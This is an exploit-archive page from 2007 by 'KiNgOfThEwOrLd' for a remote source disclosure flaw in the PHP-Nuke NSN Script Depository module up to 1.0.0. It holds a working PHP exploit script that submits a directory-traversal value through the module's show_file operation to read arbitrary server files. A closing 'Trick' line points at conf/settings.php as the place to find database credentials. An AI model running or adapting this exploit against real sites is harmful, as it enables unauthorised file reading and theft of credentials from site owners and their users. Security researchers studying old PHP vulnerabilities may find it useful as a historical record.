PHP-Nuke NSN Script Depository 1.0.0 Remote Source Disclosure Vuln

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP-Nuke NSN Script Depository 1.0.0 Remote Source Disclosure Vuln
# Published : 2007-11-27
# Author : KiNgOfThEwOrLd
# Previous Title : Eurologon CMS files.php Arbitrary File Download Vulnerability
# Next Title : 123tkShop 0.9.1 Remote Authentication Bypass Vulnerability

---------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |_______    _____/  |_          /_   |/  |_ 
 |   |/        |  | _(__  <_/ ___   __  ______  |      __
 |   |   |     |  |/         ___|  |   /_____/  |   ||  |  
 |___|___|  /__|  /______  /___  >__|            |___||__|  
          /______|      /     /                         
---------------------------------------------------------------

Http://www.inj3ct-it.org 	     Staff[at]inj3ct-it[dot]org 

---------------------------------------------------------------

PHP-Nuke NSN Script Depository module <= 1.0.0 Remote Source Disclosure

---------------------------------------------------------------

#By KiNgOfThEwOrLd

---------------------------------------------------------------
Exploit

<?
/*
Usage: 31337.php?targ=http://[target]/[phpnuke_path]&file=[file]
Example: 31337.php?targ=http://victim.com/phpnuke&file=conf/settings.php
*/
$targ = $_GET['targ'];
$file = $_GET['file'];
echo '
<form action="$targ/modules.php?name=Script_Depository" method="post">
<input name="show_file" value="/../../$file" type="hidden">
<input value="show_file" name="op" type="hidden">
<input type="submit" value="Show Source">
</form>';
?>

Trick

In conf/settings.php there are the database credentials  ;) 
---------------------------------------------------------------

# www.Syue.com [2007-11-27]